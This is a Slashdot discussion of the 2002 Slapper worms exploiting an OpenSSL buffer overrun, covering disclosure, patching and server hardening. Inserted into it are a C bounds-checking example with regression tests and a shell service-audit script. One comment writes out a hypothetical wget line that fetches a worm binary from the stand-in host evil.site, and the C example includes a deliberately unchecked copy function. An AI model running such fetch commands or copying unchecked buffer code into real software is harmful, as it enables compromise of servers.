Posted by CmdrTaco on from the random-dune-reference-here dept.
randomErr writes "The worms, Slapper.B and Slapper.C, which exploit a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process, have infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company."
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched. ;)
It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
It would be preferable to let the security at the bank know that you're about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
-- Analytic & algebraic topology of locally Euclidean metrization of infinitely differentiable Riemannian manifold
Re:A few hopes... by larien · Score: 5, Informative
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
The bug was patched 2 months ago so I guess that is the case :>
Re:A few hopes... by Anonymous Coward · Score: 2, Interesting
Whoever is writing these worms knows how much damage they're doing to open source.
Most likely they don't give a shit or didn't even consider it. Not everybody is politically motivated. Some people actually see computers as nothing more than a tool, and don't really care if we live in a communist "free" world or a market-driven capitalist one, as long as their computer helps them do what they want to do. It's just a hunk of silicon, steel and plastic - it has no soul, no social conscience and its configuration is no reflection on themselves.
What a revolutionary idea! Having said that remember that people writing worms are not likely to care much about the effect of their actions, whether it's denying you connectivity or canonizing Bill Gates.
Re:A few hopes... by Anonymous Coward · Score: 0
Pfff.. it would also be better if people informed Microsoft of _every_ exploit before releasing virii in the wild :)
I bet M$ developers made this worm to make friends!
After all, now the open source community and Microsoft have something in common. They both suck when it comes to security ;-)
> It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Pfff.. it would also be better if people informed Microsoft of _every_ exploit before releasing virii in the wild :)
I know of many examples, but it's minutes before I leave for work and I cannot cite them. But I'm hoping that you (and many others) are aware that many hackers who have found exploits in Microsoft products do inform Microsoft of the problem before releasing the exploit. Microsoft turn around and ignore them and do nothing until the hacker releases the exploit out into the open. With Microsoft, you don't get anything patched unless it makes a bad PR spin.
One such example of this was the Win32 message system allowing code to elevate its privs by sending commands to higher-priv'ed processes. It was posted to /. a few weeks ago.
Problem is, it's a similar scenario to how Windows admins get burnt - it's just that there's usually a shorter interval between patch-exploit in the Windows admin world.
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
Whoever is writing these worms knows how much damage they're doing to open source. Maybe these worms come from Microsoft themselves?
Re:A few hopes... by BESTouff · Score: 2, Insightful
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Don't forget to half-close your eyes
Re:A few hopes... by AndrewHowe · Score: 3, Insightful
If Open Source claims that it is somehow better at dealing with this sort of thing, and it turns out that it isn't, then it deserves the "damage" you speak of. Why should Open Source be immune from criticism? Live by the sword, die by the sword.
All of what you said could be said of Microsoft and Windows administrators, but of course we'd never say that...
Part of the problem is that servers which are already in use often never get patched. This applies to any OS.
Management at one large ISP I once worked with wanted new stuff put in to make themselves look good to their bosses. Patches just took time away from that, and didn't make anyone look good, thus it didn't happen. Until Code Red, that is, and they will probably panic after this one.
-- this is not a sig
Re:A few hopes... by pythorlh · Score: 2, Insightful
The main difference is that Microsoft encourages the development of clueless admins. The MCxx certifications are geared to producing admins that can pass a test, not admins who can effectively administrate. Yes, there exist lame Linux certs, too, and yes, we do have clueless Linux admins. But the whole community of Linux is based on educating the user, admin or not, about how to properly configure the system. Thus, a vastly smaller percentage of Linux admins end up clueless, and the ones that do really deserve what they get. MCxx admins often have the mistaken impression that they already know enough to do their job. Linux admins generally know what they don't know, and know who to go to to ask.
-- Do not confuse duty with what other people expect of you; they are utterly different. Duty is a debt you owe to yourself.
"2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm."
You hypocrite. When people released and wanted to release Windows flaws without giving MS any time to develop a patch, Open source voices said that it was good and it would help show how much slower proprietary closed source companies were to patch vulnerabilities. Now that the shoe is on the other foot...
Damage to open source... The worms are showing how insecure it is too. There is no perfect operating system.
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
I am really careful about keeping my systems up to date. This worm bit me nonetheless. Here is why: I am running redhat, and sometime in February I updated my system from rawhide. Then I upgraded to 7.3 when that came out. Problem is that some of those rawhide packages, including openssl, had a higher version number than any official versions being rolled out from redhat since then. So when the patched openssl came out, my system (using up2date and autoupdate) ignored the new package.
I think I will try to stay away from rawhide in the future.
-- "Don't let them generation-gap you!" - W. Gibson
Yeah, the admins should have patched this up. Wanna know the funniest? Check this article where a security writer got hit with Slapper. It shows even those who should know better sometimes get hit.
But the whole community of Linux is based on educating the user
Ahh, would this be the RTFM mantra?
Linux admins generally know what they don't know
Interesting, I've always wondered whether an exploit gets picked up publicly before a program exists to exploit it, or does the program generally exist first?
Whilst there are cases where you are correct, the one you cited was a poor choice. I assume you are referring to 'shatter' as written by Fat^H^Hoon. The article was submitted to both slashdot and kuro5hin, and despite anti-MS bias (esp. on slashdot) the majority of people laughed at it.
Everyone agreed that the problem is with the application, not the messaging system. If I am a normal user, then why the fuck do I have a dialog window with root privileges? It's like creating a unix app that pipes commands to suid-root bash and granting execute permissions to all users. Then you can claim that the unix pipe commands are insecure because it allows you to pipe "rm -rf/" to this higher privilege process...
Incidentally, MS make no secret about this, and have acknowledged the possibilities way before Foon did - their stance I believe is "security ends at the desktop" which is exactly where it should end. If an app vendor chooses to give users a dialog running as root then it's clear who's to blame.
Re:A few hopes... by Anonymous Coward · Score: 0
Gee, just like the fucking RedCode worm. The fixes were out for a month before it hit. You fuckers are just now learning that your POS OS isn't as secure as you've been touting all these years. Worse yet, you're subject to the exact same security problems: crappy admins.
Re:A few hopes... by Anonymous Coward · Score: 0
A few weeks ago someone posted an article about THE SAME WORM!! Jesus, people need to start paying attention, this is nothing new.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
To be fair to the OpenSSL guys, there was a fix out BEFORE this worm was created.
To not be fair to the OpenSSL guys, someone (smarter than I) needs to rewrite OpenSSL, there are GOTOs in there!! Eeewww!
No one said anything about Windows in this thread, troll.
What I find amusing is the thought that because of the availability of source code for both the vulnerable and fixed versions of this application, that even an unclever hacker could run a diff to see what was changed, then know exactly how to write code that would crack the server.
Not like I'm complaining, a good exploit is actually needed whenever there is a vulnerability. The exploit becomes a vital unit test to ensure that that particular vulnerability stays repaired in future versions.
it's not the GOTO's that are bad, it's the programmers that use them poorly that make them bad. would you say that #include directive is bad? well, how about this:
if(foo > 0) { #include "bar.c" }
looks pretty nasty to me and yes, i have actually seen this in some code for a very large project. maybe we should put #include's in the same category as GOTO's?
Re:A few hopes... by Anonymous Coward · Score: 0
RTFM is telling someone that the answer to their question is in the FAQ. It's short hand so that you can quickly move on to more important questions in your mail box instead of answering the same newbie questions time after time after time.
Re:A few hopes... by Anonymous Coward · Score: 0
> It would be preferable to let the security at the bank know that you're about to commit armed robbery so they can stop you.
Exactly. Lots of organizations have security groups that do this sort of thing. "We're going to be testing everyone's security by staging several kinds of breakins. Our operatives will be carrying proper ID, which they will show you if you manage to apprehend them. But we won't tell you the time or place of our attack..."
There is a history of security firms doing this sort of thing, with the full knowledge of their customers' top management. There is also a history of accounting departments inserting dummy data as a test of the auditors. If the auditors don't find it, they flunk.
Any organization NOT doing this sort of test of their security is vulnerable.
-- Those who do study history are doomed to stand helplessly by while everyone else repeats it.
Re:A few hopes... by n9hmg · Score: 3, Insightful
Explain RTFM? While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people write documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioner's name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English (technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could." Here on /., people are often more terse, and when somebody says or asks something ignorant (or maybe just plain stupid), responders can get pretty rude. In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes... by evilpenguin · Score: 5, Insightful
And any organization doing this sort of test is STILL vulnerable. That's the problem with trying to prove a negative. Just because an intrusion failed this time does not mean that it will next time. Now, I'm not arguing against performing the kind of assessment and audit you are talking about here, but such tests are only part of the process.
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on closed or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, because system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue so critical that it should short-circuit regression testing is a difficult art. And what if the production system doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
Re:A few hopes... by Anonymous Coward · Score: 0
The main difference is that Microsoft encourages the development of clueless admins. The MCxx certifications are geared to producing admins that can pass a test, not admins who can effectively administrate.
Actually, the Windows 2000 and newer tests are pretty good, much better than the older ones. The problem is that the tests are so popular that there is a whole industry based on helping you pass the test. I know a few people who spent thousands to go to one of those MCSE bootcamps and just took the tests until they passed them. I would really like it a lot better if Microsoft required at least one of the exams to be hands-on troubleshooting scenario similar to what you find in some of the other certs.
Re:A few hopes... by Anonymous Coward · Score: 0
Do you know how buffer over-runs work? By your comment, I would guess that's a very solid "no". You see, when a buffer is unchecked, it may be possible to expose the code to conditions that will cause the program to behave differently. By doing this, you might be able to have the program operate foreign code at the memory space of the buffer, and any foreign code would have privilege identical to the program that it's taking over.
Once you patch a buffer over-run like this one, an attack on it is fruitless. The only way to re-exploit it is if there were still an over-run, with different conditions. Since that's very likely to be untrue, that buffer is pretty safe. The only thing an attacker can gain through the use of source code is another way to exploit some other buffer, which is sometimes entirely possible with huge libraries like SSL, and programs like Apache. It's a real job to get the bugs out.
You're right. Both are examples of phenomenally bad code. Any statement can be used poorly. I think the point that was being made is that there is no way to not use goto badly. The only reason that goto even exists is to be a shortcut around bad code design.
If you can't do it without a goto, then maybe you should go over your design again and look for a better way.
Just my opinion. I could be wrong. I doubt it, though.
-- I want all of the power and none of the responsibility.
Re:A few hopes... by Anonymous Coward · Score: 0
Yeah, and who wants to bet that MS is somehow behind a good portion of these exploits in linux? They have the manpower, resources and motive. Whenever something happens to open source software, they make a pretty big deal about it...
Re:A few hopes... by Anonymous Coward · Score: 0
Every single loop (for, while) and most conditional statements (if, switch) use goto. Just because it's inserted by the compiler doesn't change the fact.
Goto is one of the fundamental operations of all computer programs.
Um, I am fairly familiar with the concept of a buffer overrun-- in fact, you don't need to check the buffer, you probably want to check your input... the buffer isn't going to overrun all by itself. What I am not so familiar with is how you got from my comment to yours. Perhaps you are not so familiar with the concept of unit testing?
If you are trying to say that taking a known exploit and turning it into a unit test is a bad idea, then please say that. But it's stupid to throw away a perfectly useful unit test just because you say you've fixed the bug. What if someone swaps out your repaired routine entirely and rewrites it-- accidentally rewriting the buffer overflow you repaired? Having the exploit as a unit test will catch this. Your approach won't.
-- I do not have a signature
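The two posts above make complementary points: one explains what an unchecked length does to a fixed buffer, the other argues that a known failure case should be kept as a regression test so a later rewrite cannot quietly bring the bug back. The C below is an added illustration of that idea, not code from the thread or from OpenSSL. It models a hypothetical length-prefixed handshake field (one length byte, then that many payload bytes) copied into a fixed-size destination; FIELD_MAX, the struct and the function names are all assumptions. It shows the unchecked copy beside a version that validates the wire length against the destination, and a regression test that feeds an over-long length and expects rejection.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not OpenSSL code: a hypothetical length-prefixed field
 * (one length byte followed by that many payload bytes) copied into a
 * fixed-size destination. FIELD_MAX and the names below are assumptions. */
#define FIELD_MAX 16

struct field {
    uint8_t data[FIELD_MAX];
    size_t len;
};

/* The bug pattern under discussion, kept only for contrast: the copy
 * length comes straight from the wire and is checked against the source
 * buffer but never against the destination, so a length byte larger than
 * FIELD_MAX writes past out->data. Never call this on untrusted input. */
int parse_field_unchecked(const uint8_t *in, size_t in_len, struct field *out)
{
    if (in == NULL || out == NULL || in_len < 1)
        return -1;
    size_t len = in[0];
    if (in_len < 1 + len)
        return -1;
    memcpy(out->data, in + 1, len); /* overruns when len > FIELD_MAX */
    out->len = len;
    return 0;
}

/* Hardened version: validate the input before it touches the buffer.
 * Returns 0 on success, -1 on bad arguments, -2 when the declared length
 * exceeds the destination, -3 when the record is truncated. */
int parse_field(const uint8_t *in, size_t in_len, struct field *out)
{
    if (in == NULL || out == NULL || in_len < 1)
        return -1;
    size_t len = in[0];
    if (len > FIELD_MAX)
        return -2;
    if (in_len < 1 + len)
        return -3;
    memcpy(out->data, in + 1, len);
    out->len = len;
    return 0;
}

/* Regression test distilled from the failure case: a record whose length
 * byte (255) claims far more than FIELD_MAX bytes. Returns 1 when the
 * hardened parser rejects it, 0 otherwise. Keep it in the suite; a rewrite
 * that drops the destination check fails here instead of in production. */
int regression_oversized_length(void)
{
    uint8_t rec[256];
    struct field f;
    memset(rec, 'A', sizeof rec); /* constructed input */
    rec[0] = 255;
    return parse_field(rec, sizeof rec, &f) == -2;
}

/* A well-formed record must still parse: length 5, payload "hello". */
int valid_record_parses(void)
{
    const uint8_t rec[] = { 5, 'h', 'e', 'l', 'l', 'o' }; /* constructed input */
    struct field f;
    if (parse_field(rec, sizeof rec, &f) != 0)
        return 0;
    return f.len == 5 && memcmp(f.data, "hello", 5) == 0;
}

/* A record that promises more bytes than it carries is rejected too. */
int truncated_record_rejected(void)
{
    const uint8_t rec[] = { 10, 'a', 'b' }; /* constructed input */
    struct field f;
    return parse_field(rec, sizeof rec, &f) == -3;
}

int main(void)
{
    printf("oversized length rejected: %d\n", regression_oversized_length());
    printf("valid record parses:       %d\n", valid_record_parses());
    printf("truncated record rejected: %d\n", truncated_record_rejected());
    return 0;
}
```

The unchecked variant is included only so the two bounds checks can be compared side by side; the test functions exercise the hardened parser alone. The point of `regression_oversized_length` is the one the poster makes: the failing input outlives the fix, so a future refactor is checked against it automatically rather than against someone's memory of the bug.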
Re:A few hopes... by Anonymous Coward · Score: 0
Microsoft produces no more clueless admins than, say, Red Hat or any of the other mainstream Linux distributions that have a checkbox during the install to enable Web servers, email servers, FTP servers, etc. People are setting up services on both Linux and Windows that have no clue how they work or what they do. Whether you're on Windows or Linux, an idiot admin is going to be open to this stuff. We had our Linux DNS server hacked last month for just this reason. This is an education problem not an operating system problem.
Re:A few hopes... by Anonymous Coward · Score: 0
I know there was an OpenSSL bug in an OpenBSD release, but a patch for that was released more than a month ago. Is this another bug? I notice no mention of OpenBSD this time, instead it was Linux variants. Has this bug just been discovered? Or was it from a few months ago, and an exploit was just released to exploit Linux?
OK... totally off-topic here, but I wanted to respond to this with some thinking I've been doing lately:
Interesting point that you make at the end: "This is an education problem not an operating system problem." But, this is wrong. The real answer is that computers are still too hard to use. You are applying this towards the admin end of things, but I am going to shift to the users in a little bit.
As far as the admins go, I think we need to work towards a time when there is no need for an admin. WHAT!!? Heresy you say? No, practicality. Technicians that repair/swap out broken hardware should be around, but OSes and networks should pretty much run themselves.
The original automobiles were hard to use and generally operated by people with a sharper intellect and an ability to work on their cars. Today, any monkey can (almost) operate a car with a minimum of education. And when it breaks down, they take it to a technician to fix the problem. The end-user does not need to know anything about how it operates to get it to move and take them places. That's the direction computers should go in, from both the admin and user perspectives.
Again... the car example: you don't see people getting certified to drive different cars by make, do you? Going from one OS to another should not be as difficult as it is. There are many reasons for the difficulty: monopolies putting up roadblocks, open source programmers who aren't writing for Joe Average, an outdated platform (x86, ISA, PCI...), etc...
As far as users go, I think that we expect too much of them. Even in the Windows world, things that should be simple procedures are difficult if you don't have the "right" software.
Over the weekend, my dad asked me how he could record himself onto a CD with his burner (in Windows). I thought... Easy! I spent the better part of the afternoon trying to show him how to use his limited edition of Roxio and Audacity in conjunction to do this. (He can't afford to buy anything better and he can't use Linux) It turned out not to be so easy after all. The concept of using two different apps to access/create data for each other is an alien and confusing concept to most people since they don't get the abstraction and have problems thinking in a hierarchical fashion. My dad was just hoping to be able to plug in a mic, press record and get his voice on a CD. He didn't want to mess with creating folders and files and editing his recordings. Sure, there are some programs that would keep the user in one application throughout the process, but it's still alien to them. This is why I still say computers are not easy to use.
Just like cars, there will always be a small population of people who understand computing devices pretty thoroughly, and there will always be others who just want to turn the key and drive. So, it's not an education issue, it's a platform, OS, application issue. Ditch the old way of thinking and look at it this way... Someday computing should be happening all around us without any need for us to directly interact. The entire world around us should be one big user interface. Forget "desktop" environment and think about getting computing into the physical realm... Then we won't have what appears to currently be an education problem. And... if we apply this thinking to open source projects now, we'll be right on track with where the world is going.
-- -"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
You think this is tied to the popularity increase of Linux in the userbase?
Yes, just like in the case with Windows.
-- Beware: In C++, your friends can see your privates!
Re:Bravo by Anonymous Coward · Score: 0
Great spin!
1. Linux is catching up to windows! Ha ha...
2. Linux is so popular, sophisticated worms are appearing!
Go into politics - a bright future awaits. But give up on the idea of determining the worm's origins, you wouldn't be able to tell anyway.
Re:Bravo by Anonymous Coward · Score: 0
Bullshit. Windows servers make up less of the market than Linux.
And how fast did code red spread? Almost fifty thousand in a single day? NONE were Linux. Popularity has nothing to do with Windows exploits. It's just so god damned easy.
You didn't quite catch the next line in the grandparent post?
His point was that Linux has been widespread on webservers for a while now. It's not the ever-growing Linux userbase that's the _direct_ cause of this worm.
Though, you have a point. A growing Linux user base attracts the kind of people that create worms as well.
Re:Bravo by Anonymous Coward · Score: 0
Windows servers make up less of the market than Linux.
Sorry, try again troll. More websites are run on Apache than IIS but this says nothing of web servers let alone file servers, application servers, mail servers, etc. I think you will find that Microsoft leads in physical web servers according to Netcraft but Apache is popular with webhosts that host hundreds of websites on one server. I think you will also find that true Unixes are still more popular than Linux on application servers and such.
Somebody must have the link to the website that has the ratio of viruses to server. Microsoft still had a larger ratio but it was not as disparate as you would think. If I remember it was one of the BSD's that had the lowest ratio.
"The worms, Slapper.B and Slapper.C, which exploit a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process, have infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company."
Time to grab a coffee.. I thought it said "thanks to Helsinki-based F-Secure Corp." :-)
Re:Misread by Anonymous Coward · Score: 1, Funny
Time to grab a coffee.. I thought it said "thanks to Helsinki-based F-Secure Corp." :-)
Good idea. Get me one too.
Re:Misread by Anonymous Coward · Score: 1, Funny
use chkrootkit to see if you've gotten it by motorsabbath · Score: 5, Informative
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
-- The heat from below can burn your eyes out
Re:use chkrootkit to see if you've gotten it by RudeDude · Score: 2, Informative
FYI The most common MD5 sig for the 0.37 tarball seems to be: b0feebea67655daa440da92099dd5187
But for some reason I also see a different MD5 for what is supposed to also be 0.37: edf50a9c8c6bf09b0a9147f2e6168826 BUT that is actually the signature from 0.35
So the bottom line is, try not to panic. Some mirrors are just a little out of sync. I am still a little nervous running this thing as root since I haven't seen anyone report that it's not a trojan itself. I guess some code review is in order. :)
-- RudeDude
Perl/Linux/PHP hacker
Re:use chkrootkit to see if you've gotten it by Surye · Score: 0
I have been using this for a while, and I have seen no sign of it being a trojan itself.
Re:use chkrootkit to see if you've gotten it by friedmud · Score: 2
As a side note - you should know that if you were using Gentoo linux all you have to do is:
emerge chkrootkit
And it will get the source, check the md5, compile, and install it for you.
Derek
Re:use chkrootkit to see if you've gotten it by Anonymous Coward · Score: 0
On my Redhat 7.2, the chklastlog script is looking for /var/adm/lastlog. I changed it to:
#define LASTLOG_FILENAME "/var/log/lastlog"
and recompiled to get it to work.
oh no! by Anonymous Coward · Score: 0, Funny
This is the sort of thing that makes open source (and linux) look amateurish, unprofessional, and insecure. Coming only a day after Microsoft's jihad against Open Source, though, could it be a coincidence?
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms? It looks like they've found Open Source's achilles heel :(
So what can we do about it? Maybe we should abandon the GPL (which allows anyone to contribute ticking timebomb patches) and use a better license, such as the Microsoft Shared Source license. That may be the only way to save linux!
"What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects"
How nice. Or should I say how pathetic? You have absolutely zero evidence they do that sort of thing but you throw shit like that out there just to stir things up. And I realize that you don't actually accuse them of doing it, but just by mentioning it you have basically done the same.
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
No. This is purely an openssl problem. It was patched in July! The "blame" goes with those who don't apply security patches marked as critical. The worm could as easily have been written to attack users of unpatched installations of stunnel-win32, but that wouldn't be nearly as satisfying for a worm-writer as something that can attack apache on linux.
You should put this on your resume when you apply at Microsoft...
Same mantra applies to Linux and MS sysadmins:
by
bittmann
·
· Score: 5, Informative
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Informative
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
If you must use a compiler on your web server, FFS run the publicly accessible service in a chroot jail!
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
rmadmin
·
· Score: 2
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "
helpfully" been activated in the base install);
Or in Solaris sysadmin speak, or in Redhat sysadmin speak. For instance, Solaris tends to run NFS stuff by default. And Redhat (probably a few other distros too) tends to have a dozen or so unused services running.
Re:Same mantra applies to Linux and MS sysadmins:
by
mjh
·
· Score: 2
2) Keep up to date on your patch levels.
Thank you, debian, for apt. Here's how I keep up to date with patches:
apt-get update && apt-get -u upgrade
Apt is such a great idea. It's a better idea than RHN or whatever it is that mandrake is doing. Why? Because there are a ton of debian developers, each of them only having to watch a relatively small number of packages And when they keep up with patches, I do too, for almost no work.
This is the beauty of apt - it distributes patch management among a lot of people so that the load of any of them is relatively small. But then it allows all of us to leverage that work. It's distributed AND centralized all in one.
I'm not trying to start an distro war here. I'm just *SOOO* thankful for apt and debian. I'm trying to express gratitude. If it came out as flamebait, it was not intended.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins:
by
mrseth
·
· Score: 2
I know. I do the same thing on my RedHat boxes with this.
Re:Same mantra applies to Linux and MS sysadmins:
by
AftanGustur
·
· Score: 2
That 1) is *extremely* important. If you're running RedHat you can use "chkconfig --list" to see what network-based services are running (all services actually).
For everything you don't know what is, don't hesitate to do a "chkconfig --del [service]". It's not really deleted, just disabled.
Also, do a "rpm -qa" and "rpm -e [package]" for everything you don't know/need. It's better to have to spend some time fixing a problem that you caused yourself than fixing something that was done by an intruder.
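As an added example (not code from any poster in this thread), here is a small POSIX sh audit that takes text in the layout of `chkconfig --list`, extracts the services enabled in runlevels 3 or 5 (plus xinetd services marked on), reports the ones missing from an allowlist, and prints the `chkconfig` command that would turn each of them off. The sample listing and the allowlist are constructed for the example; on a real box you would feed it the output of `chkconfig --list` and your own list of the services the machine is actually there to run.

```sh
#!/bin/sh
# Added example: audit enabled services against an allowlist.
# Input is text in the layout of "chkconfig --list"; the listing below is
# constructed sample data, not taken from any real host.

SAMPLE_CHKCONFIG='httpd           0:off   1:off   2:on    3:on    4:on    5:on    6:off
sshd            0:off   1:off   2:on    3:on    4:on    5:on    6:off
nfs             0:off   1:off   2:off   3:on    4:on    5:on    6:off
portmap         0:off   1:off   2:on    3:on    4:on    5:on    6:off
sendmail        0:off   1:off   2:on    3:on    4:on    5:on    6:off
xinetd based services:
        telnet: on
        finger: off'

# Services this particular box is meant to run (assumption for the example).
ALLOWED="httpd sshd"

# enabled_services LISTING
#   Print the name of every SysV service that is "on" in runlevel 3 or 5,
#   and every xinetd-managed service marked "on".
enabled_services() {
    printf '%s\n' "$1" | awk '
        /^[^ \t].*[35]:on/         { print $1 }
        /^[ \t]+[^ \t]+:[ \t]+on$/ { sub(/:$/, "", $1); print $1 }
    '
}

# unexpected_services LISTING ALLOWLIST
#   Print enabled services that are not in the space-separated ALLOWLIST.
unexpected_services() {
    allow=" $2 "
    enabled_services "$1" | while IFS= read -r svc; do
        case "$allow" in
            *" $svc "*) ;;                    # expected on this box
            *)          printf '%s\n' "$svc" ;;
        esac
    done
}

# disable_commands LISTING ALLOWLIST
#   Print the command that turns each unexpected service off in the
#   multi-user runlevels. Nothing is executed: review the list first.
disable_commands() {
    unexpected_services "$1" "$2" | while IFS= read -r svc; do
        printf 'chkconfig --level 345 %s off\n' "$svc"
    done
}

# Stand-alone use: report on the constructed sample.
unexpected_services "$SAMPLE_CHKCONFIG" "$ALLOWED"
```

The point of keeping the allowlist explicit is the one made in the post above: every enabled service you cannot name a reason for is a candidate to be switched off, and a list you can diff against after the next install or upgrade is easier to keep honest than a one-off look at `chkconfig --list`.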
Re:Same mantra applies to Linux and MS sysadmins:
by
andcal
·
· Score: 1
Warning! Quantum mechanics dictate that what you are observing may not be the actual contents of this post.
I thought quantum mechanics dictate that what I am observing may not be the actual state of the contents until I looked at the contents.
-- --something witty
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 5, Insightful
3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Insightful
